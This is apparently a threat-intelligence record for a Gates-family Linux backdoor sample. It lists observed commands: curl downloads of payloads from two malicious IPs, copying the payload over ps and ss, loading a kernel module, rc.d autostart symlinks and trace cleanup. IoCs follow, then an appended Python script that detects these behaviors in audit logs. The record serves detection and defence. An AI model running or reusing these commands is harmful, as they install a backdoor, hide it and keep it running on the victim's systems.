Summary
The sample's behavior includes contacting malicious IPs, loading a kernel module, and establishing a backdoor. This resembles the Gates backdoor family, so the sample is presumed to be a backdoor that entered the host through the DDoS malware.
Sample type
Backdoor, remote control
Elkeid sample ID
elkeid_20221111_backdoor_4
Capture time
- 20221111
Last active
- 20221115
Keywords
S97DbSecuritySpt, bsd-port
Known intrusion paths
- SSH brute force
- DDoS
Main behaviors
Rename (copy the payload over system binaries)
- cp -f /usr/bin/service /usr/bin/.sshd
- cp -f /usr/bin/service /usr/bin/bsd-port/getty
- cp -f /usr/bin/apache /usr/bin/.sshd
- cp -f /usr/bin/apache /usr/bin/bsd-port/getty
- cp -f /usr/bin/bsd-port/getty /bin/ps
- cp -f /usr/bin/bsd-port/getty /bin/ss
- cp -f /usr/bin/bsd-port/getty /usr/bin/ps
- cp -f /usr/bin/bsd-port/getty /usr/bin/ss
Load kernel module
- insmod /usr/bin/bsd-port/xpacket.ko
- insmod /usr/bin/xpacket.ko
File download
- curl -O http://103.116.45.104:11230/service
- curl -O http://103.99.209.43:222/apache
Create malicious backdoor symlinks (rc.d autostart persistence)
- ln -s /etc/init.d/DbSecuritySpt /etc/rc1.d/S97DbSecuritySpt
- ln -s /etc/init.d/DbSecuritySpt /etc/rc2.d/S97DbSecuritySpt
- ln -s /etc/init.d/DbSecuritySpt /etc/rc3.d/S97DbSecuritySpt
- ln -s /etc/init.d/DbSecuritySpt /etc/rc4.d/S97DbSecuritySpt
- ln -s /etc/init.d/DbSecuritySpt /etc/rc5.d/S97DbSecuritySpt
- ln -s /etc/init.d/selinux /etc/rc1.d/S99selinux
- ln -s /etc/init.d/selinux /etc/rc2.d/S99selinux
- ln -s /etc/init.d/selinux /etc/rc3.d/S99selinux
- ln -s /etc/init.d/selinux /etc/rc4.d/S99selinux
- ln -s /etc/init.d/selinux /etc/rc5.d/S99selinux
Clean up traces
- rm -rf service
IoC
- 103.116.45.104
- 103.99.209.43
Reference links
http://www.ttlsa.com/safe/linux-antivirus-action/
https://cloud.tencent.com/developer/article/1459350
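As an added example (not part of the original record and not Elkeid code), a small Python hunt that classifies process-audit command lines against the behaviors and IoCs listed above; the log format used for the sample lines is a constructed simplification, not real Elkeid output.

```python
import re

# Indicators taken from the sample record: download IPs, staging paths, rc.d names.
IOC_IPS = {"103.116.45.104", "103.99.209.43"}
STAGING_PREFIXES = ("/usr/bin/bsd-port/", "/usr/bin/.sshd")
SYSTEM_BINS = {"/bin/ps", "/bin/ss", "/usr/bin/ps", "/usr/bin/ss"}
RC_LINK = re.compile(r"/etc/rc[0-6]\.d/S9[79](DbSecuritySpt|selinux)\b")


def classify(cmdline: str) -> list:
    """Return the behavior tags from the record that one command line matches."""
    tags = []
    argv = cmdline.split()
    if not argv:
        return tags
    prog = argv[0].rsplit("/", 1)[-1]
    # insmod of the xpacket.ko module from either observed location
    if prog == "insmod" and any(a.endswith("xpacket.ko") for a in argv[1:]):
        tags.append("load_kernel_module")
    # cp over ps/ss, or cp into the bsd-port / .sshd staging paths
    if prog == "cp" and (argv[-1] in SYSTEM_BINS or argv[-1].startswith(STAGING_PREFIXES)):
        tags.append("rename_system_binary")
    # ln -s creating the S97DbSecuritySpt / S99selinux autostart links
    if prog == "ln" and RC_LINK.search(cmdline):
        tags.append("rc_d_persistence")
    # downloader reaching one of the IoC addresses
    if prog in ("curl", "wget") and any(ip in cmdline for ip in IOC_IPS):
        tags.append("download_from_ioc_ip")
    return tags


def scan(log_lines) -> list:
    """Return (line_no, tags) for every audit line whose cmdline matched."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = re.search(r'cmdline="([^"]*)"', line)
        if m and (tags := classify(m.group(1))):
            hits.append((n, tags))
    return hits


# Constructed sample lines (hypothetical key=value audit format). The bare
# `rm -rf service` cleanup step is deliberately not a rule: alone it is too generic.
SAMPLE_LOG = [
    'type=EXECVE uid=1000 cmdline="ls -la /tmp"',
    'type=EXECVE uid=0 cmdline="curl -O http://103.116.45.104:11230/service"',
    'type=EXECVE uid=0 cmdline="cp -f /usr/bin/bsd-port/getty /bin/ps"',
    'type=EXECVE uid=0 cmdline="insmod /usr/bin/bsd-port/xpacket.ko"',
    'type=EXECVE uid=0 cmdline="ln -s /etc/init.d/DbSecuritySpt /etc/rc3.d/S97DbSecuritySpt"',
    'type=EXECVE uid=0 cmdline="rm -rf service"',
]

if __name__ == "__main__":
    for line_no, tags in scan(SAMPLE_LOG):
        print(f"line {line_no}: {', '.join(tags)}")
```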